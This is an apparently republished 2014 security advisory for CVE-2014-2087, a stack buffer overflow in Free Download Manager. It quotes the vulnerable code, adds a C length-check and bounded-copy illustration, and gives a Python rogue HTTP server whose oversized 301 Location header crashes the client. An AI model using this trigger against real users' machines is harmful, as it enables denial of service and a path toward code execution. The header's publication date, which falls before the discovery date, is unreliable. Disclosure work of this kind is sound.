Free Download Manager 3.x Buffer Overflow Vulnerability
Source: vfocus.net  Author: Ahrens  Published: 2014-03-17
1. ADVISORY INFORMATION
-----------------------
Product:        Free Download Manager
Vendor URL:     www.freedownloadmanager.org
Type:           Stack-based Buffer Overflow [CWE-121]
Date found:     2014-02-20
Date published: 2014-02-13
CVSSv2 Score:   9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
CVE:            CVE-2014-2087
   
   
2. CREDITS
----------
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
   
   
3. VERSIONS AFFECTED
--------------------
Free Download Manager v3.9.3 build 1360 (latest)
Free Download Manager v3.8 build 1173
Free Download Manager v3.0 build 852
and other older versions may be affected too.
   
   
4. VULNERABILITY DESCRIPTION
----------------------------
A stack-based buffer overflow vulnerability has been identified in the
Free Download Manager.
   
The application parses download requests, which are added to the
download queue, but does not properly validate the length of the
complete download queue object when it’s removed from the queue by the
user. The following function from fdm.exe (source file:
Downloads_Deleted.cpp) is triggered on deletion:
   
void CDownloads_Deleted::UpdateDownload(int iItem)
   
This function reads the filename of the download object using
CDownloads_Tasks::GetFileName into szFile and adds the whole URL value
as a description (in brackets) via an insecure strcat() sequence to
szFile during the queue deletion process.
  
Since the application follows HTTP 301 redirects, an attacker who
controls the target HTTP server is able to send arbitrarily long filename
values to exploit this flaw. If the filename together with the appended
URL exceeds the size of szFile (10000 bytes), strcat() writes outside the
expected memory boundaries.
   
This leads to a stack-based buffer overflow with an overwritten SEH
chain or return points, resulting in remote code execution. Successful
exploits can allow remote attackers to execute arbitrary code with the
privileges of the user running the application. Failed exploits will
result in a denial-of-service condition.
   
This vulnerability is also exploitable locally via "File->Import->Import
list of downloads".
   
   
5. VULNERABLE CODE PART
-----------------------
// Downloads_Deleted.cpp
   
void CDownloads_Deleted::UpdateDownload(int iItem)
{
    vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);
   
    CHAR szFile [10000];                          // fixed-size stack buffer
    CDownloads_Tasks::GetFileName (dld, szFile);  // filename of the download, length not validated
    lstrcat (szFile, " (");                       // unbounded concatenations: no check of remaining space
    lstrcat (szFile, dld->pMgr->get_URL ());      // URL length is attacker-controlled via the 301 redirect
    lstrcat (szFile, ")");
    SetItemText (iItem, 0, szFile);
[..]
}
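As an added illustration (not code from the advisory or from Free Download Manager's sources), the following C models the length arithmetic behind the bug and a bounded replacement for the lstrcat sequence; required_len, would_overflow, build_item_text and run_case are hypothetical names, and the 'C'-filled inputs are constructed to match the PoC's 9000-byte Location header.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SZFILE_LEN 10000  /* size of szFile in CDownloads_Deleted::UpdateDownload */

/* Bytes the vulnerable lstrcat sequence writes into szFile, NUL included:
 * filename + " (" + url + ")" + '\0'. */
size_t required_len(const char *filename, const char *url)
{
    return strlen(filename) + 2 + strlen(url) + 1 + 1;
}

/* 1 if that sequence would run past a SZFILE_LEN-byte buffer, else 0. */
int would_overflow(const char *filename, const char *url)
{
    return required_len(filename, url) > SZFILE_LEN;
}

/* Bounded replacement (hypothetical fix): snprintf writes at most outsz bytes
 * and NUL-terminates. Returns 0 on success, -1 if the text was truncated. */
int build_item_text(const char *filename, const char *url, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "%s (%s)", filename, url);
    return (n >= 0 && (size_t)n < outsz) ? 0 : -1;
}

/* Constructed input: filename of namelen 'C' bytes, URL of urllen 'C' bytes,
 * mirroring the 9000-byte Location header in the advisory's PoC. Stores
 * would_overflow() in *overflows and returns the bounded builder's status. */
int run_case(size_t namelen, size_t urllen, int *overflows)
{
    char *name = malloc(namelen + 1), *url = malloc(urllen + 1), out[SZFILE_LEN];
    if (!name || !url) { *overflows = -1; free(name); free(url); return -1; }
    memset(name, 'C', namelen); name[namelen] = '\0';
    memset(url, 'C', urllen);   url[urllen] = '\0';
    *overflows = would_overflow(name, url);
    int rc = build_item_text(name, url, out, sizeof out);
    free(name); free(url);
    return rc;
}

int main(void)
{
    int ovf, rc = run_case(9000, 9000, &ovf);        /* PoC-sized input */
    printf("PoC size: overflow=%d bounded_rc=%d\n", ovf, rc);
    rc = run_case(20, 40, &ovf);                      /* ordinary download */
    printf("normal:   overflow=%d bounded_rc=%d\n", ovf, rc);
    return 0;
}
```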
  
  
6. PROOF-OF-CONCEPT (PYTHON)
----------------------------
#!/usr/bin/env python3
# Rogue HTTP server: answers the first request with a 301 whose Location
# header carries an overlong filename, so the redirected download name plus
# the URL appended in UpdateDownload() exceeds the 10000-byte szFile buffer.
import socket
from time import sleep
   
host = "192.168.0.1"
port = 80
   
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print("\n[+] Listening on %d ..." % port)
   
cl, addr = s.accept()
print("[+] Connection accepted from %s" % addr[0])
   
junk0 = "\x43" * 9000   # 9000 x 'C': filler only, crashes the client
   
payload = junk0
   
buffer = "HTTP/1.1 301 Moved Permanently\r\n"
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"
buffer += "Server: Apache/2.2.22 (Debian)\r\n"
buffer += "Location: " + payload + "\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 8000\r\n"
buffer += "Keep-Alive: timeout=5, max=100\r\n"
buffer += "Connection: Keep-Alive\r\n"
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"
buffer += "\r\n"
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
buffer += "<html><head>\n"
buffer += "<title>301 Moved Permanently</title>\n"
buffer += "</head><body>\n"
buffer += "<h1>Moved Permanently</h1>\n"
buffer += "<p>The document has moved <a href=\"" + payload + "\">here</a>.</p>\n"
buffer += "</body></html>\n"
   
print(cl.recv(1000).decode("latin-1"))   # the client's GET request
cl.sendall(buffer.encode("latin-1"))
print("[+] Sending buffer: OK\n")
   
sleep(1)
cl.close()
s.close()
   
   
7. SOLUTION
-----------
None
   
   
8. REPORT TIMELINE
------------------
2014-02-20: Discovery of the vulnerability
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)
2014-02-24: MITRE assigns CVE-2014-2087
2014-02-25: Vendor Notification #2
2014-02-26: Vendor Notification #3
2014-03-05: Vendor Response
2014-03-05: Vulnerability details sent to vendor
2014-03-09: RCE Security asks for a status update
2014-03-13: No response from vendor
2014-03-13: Full Disclosure according to disclosure policy